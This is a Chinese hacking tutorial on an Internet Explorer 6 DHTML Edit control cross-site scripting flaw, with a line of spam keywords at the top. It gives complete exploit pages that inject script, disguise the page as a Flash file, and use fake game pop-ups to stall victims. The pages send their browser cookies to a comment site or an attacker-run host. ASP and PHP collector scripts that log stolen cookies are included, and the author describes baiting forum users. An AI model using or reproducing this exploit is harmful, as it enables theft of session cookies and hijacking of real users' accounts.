欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

MSIE DHTML Edit跨站腳本漏洞

 更新時間:2007年01月16日 00:00:00   作者:  
微軟在去年發(fā)布了MSIE DHTML Edit控件跨站腳本漏洞,但是圈內(nèi)一直沒有公布出好用的EXP,害得一幫新手叫苦不迭,別急,這不是為大家送來了大餐嗎?! 

[受影響系統(tǒng)]  
Microsoft Internet Explorer 6.0 
- Microsoft Windows XP Professional SP1  
- Microsoft Windows XP Professional  
- Microsoft Windows XP Home SP1  
- Microsoft Windows XP Home  
- Microsoft Windows ME  
- Microsoft Windows 98 SE  
- Microsoft Windows 98  
- Microsoft Windows 2000  

[漏洞描述]  
Microsoft Internet Explorer DHTML edit控件不正確過濾部分數(shù)據(jù),遠程攻擊者可以利用這個漏洞進行跨站腳本攻擊,獲得敏感信息。DHTML編輯控件存在一個安全問題可被父窗口訪問,包括Script函數(shù),攻擊者使用exeScript直接注入javascript到控件,當目標用戶打開惡意鏈接時,會導致惡意腳本代碼執(zhí)行,泄露敏感信息。 
看來只能影響到IE 6.0版本,并且對Windows XP SP2沒有作用,不過沒有給XP打SP2補丁的用戶不在少數(shù),這個漏洞的利用價值還是蠻大的。 
由于我使用的是Windwos XP SP1正好存在這個漏洞,我們就先來測試一下吧,在本地建立如下內(nèi)容的HTML頁面: 
<html> 
<head> 
<title>測試</title> 
</head> 
<body onload="setTimeout('x.DOM.body.innerHTML=\'<b>正在裝載,請稍后  
++++++++++++++</b>\'');setTimeout('main()',1000)"> 
<object  
id="x" 
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" 
width="800"  
height="600"  
align="middle" 

<PARAM NAME="ActivateApplets" VALUE="1"> 
<PARAM NAME="ActivateActiveXControls" VALUE="1"> 
</object> 
<SCRIPT> 
function shellscript() 

window.name="poorchild"; 
open("http://www.hacker.com.cn/newbbs/announcements.asp?  
action=showone&boardid=0","poorchild"); 

function main() 

x.DOM.Script.execScript(shellscript.toString()); 
x.DOM.Script.setTimeout("shellscript()"); 
alert('等等++++++++++++++++++++++++++'); 
x.DOM.Script.execScript('alert(document.cookie)'); 

</SCRIPT> 

</body> 
</html> 
用IE瀏覽器打開,如果你的系統(tǒng)存在這個漏洞,看出現(xiàn)了什么。 
呵呵,彈出了我在黑防論壇上的Cookie信息。不過這個頁面利用起來很不方便,并且成功率不高,如果沒等到DHTML控件加載完畢就點擊確定,是不會彈出任何Cookie信息的。 
沒等到頁面加載完畢就點擊彈出的第一個確定,一定會攻擊失敗,看來還是不足的。我們來對這個頁面進行一下補充和修改吧,使得它成為一個成功率高的偷取Cookie信息的網(wǎng)頁,好了,我們現(xiàn)在開始動手。 
為了增加加載時間我們先將setTimeout('main()',1000)中的參數(shù)改大一些,就設(shè)成10000把,也就是10秒,夠長了。雖然頁面顯示著正在加載,但狀態(tài)欄中卻顯示著完畢,我們來修改狀態(tài)欄的文字,加入如下的函數(shù): 
function clock() { 
var title="正在裝載,請稍后++++++++++++++"; 
status=title; 

為了盡可能的誘使瀏覽者去打開這個頁面,我們把它改名成.swf格式的文件,即把此頁面?zhèn)窝b成一個Flash文件。在頁面中加入: 
<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="800" height="600"> 
<param name="movie" value="/college/UploadPic/2006/8/27/2006827233410827.swf"> 
<param name="quality" value="High"> 
<embed src="/college/UploadPic/2006/8/27/2006827233410827.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="489" height="76" quality="High"></object> 
同時隱藏DHTML控件,即將DHTML空間的width,height屬性設(shè)置成0。為了將Cookie發(fā)送,我們添加如下腳本: 
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)"); 
這是為了測試方便,我將瀏覽者的Cookie信息發(fā)送到了網(wǎng)上一個發(fā)表評論的地方了。最終的測試頁面是: 
<html> 
<head> 
<title>測試</title> 
</head> 
<body onload="setTimeout('x.DOM.body.innerHTML=\'<b>正在裝載,請稍后++++++++++++++</b>\'');clock();setTimeout('main()',10000)"> 
<object  
id="x" 
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" 
width="0"  
height="0"  
align="middle" 

<PARAM NAME="ActivateApplets" VALUE="1"> 
<PARAM NAME="ActivateActiveXControls" VALUE="1"> 
</object> 
<SCRIPT> 
function clock() { 
var title="正在裝載,請稍后++++++++++++++"; 
status=title; 



function shellscript() 

window.name="poorchild"; 
open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild"); 

function main() 

x.DOM.Script.execScript(shellscript.toString()); 
x.DOM.Script.setTimeout("shellscript()"); 
alert("游戲名稱:神秘祭壇\n"); 
alert("測試通過者擁有著超人的觀察力!\n"); 
alert("全世界只有10個人可以全部找出!\n"); 
alert("相信你就是這10個人中的一員\n"); 
alert("祝你好運++++++++++++++++++++\n"); 
alert("務(wù)必在找到不同后點擊確定??!\n"); 
//x.DOM.Script.execScript('alert(document.cookie)'); 
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)"); 

</SCRIPT> 

<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="800" height="600"> 
<param name="movie" value="/college/UploadPic/2006/8/27/2006827233410827.swf"> 
<param name="quality" value="High"> 
<embed src="/college/UploadPic/2006/8/27/2006827233410827.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="489" height="76" quality="High"></object> 
</body> 
</html> 

其中的/college/UploadPic/2006/8/27/2006827233410827.swf是朋友發(fā)給我的地址,把我給下了一跳,不過沒想到我卻用它來騙稿費了,呵呵。 
為了測試,趕快去黑防論壇發(fā)表一篇文章,要有吸引力才行。 
夠有吸引力的了吧?我猜中招的一定不少!其實我們可以把以上的攻擊文件改名成.swf,為了在論壇上傳方便(不允許swf格式),我改名為gif格式了。 
由于它是利用的IE漏洞,這個頁面的地址可以在任意地方,不過注意: 
function shellscript() 

window.name="poorchild"; 
open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild"); 


這個函數(shù)中定義了我們要偷取瀏覽者機器中站點的Cookie信息,我設(shè)置的是黑防論壇的,大家可以換成要攻擊的論壇。同時這個頁面也要選取內(nèi)容少的頁面,最好不要帶圖片,以加快載入時間。 
好,我自己就先來看看效果吧。 

看來是成功了,為了不讓瀏覽者看到自己的的Cookie信息,可以把它發(fā)送到自己定制的ASP頁面,方法是在支持ASP和FSO組件的空間上建立以下頁面: 
<% 
testfile=Server.MapPath("cookie.txt") 
cookie=Request("cookie") 
set fs=server.CreateObject("scripting.filesystemobject") 
set thisfile=fs.OpenTextFile(testfile,8,True,0) 
thisfile.WriteLine(""&cookie& "") 
thisfile.close 
set fs = nothing 
%> 
將它命名為Cookie.asp,注意修改以下內(nèi)容: 
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)"); 
改為 
x.DOM.Script.execScript("window.open('http://youwebsite.com/cookie.asp?cookie= '+document.cookie)"); 
或在支持PHP的空間建立以下頁面: 
<?php  
$info = getenv("QUERY_STRING");  
if ($info) {  
$fp = fopen("info.txt","a");  
fwrite($fp,$info."\n");  
fclose($fp);  
}  

header("Location: http://wwwhacker.com.cn"); 
這樣通過這個漏洞,我們就可以偷取到任何論壇的Cookie信息了,不管論壇做了多么安全,只要瀏覽者IE存在此漏洞,就可成功獲取別人的Cookie,這可稱得上是論壇殺手了! 

相關(guān)文章

最新評論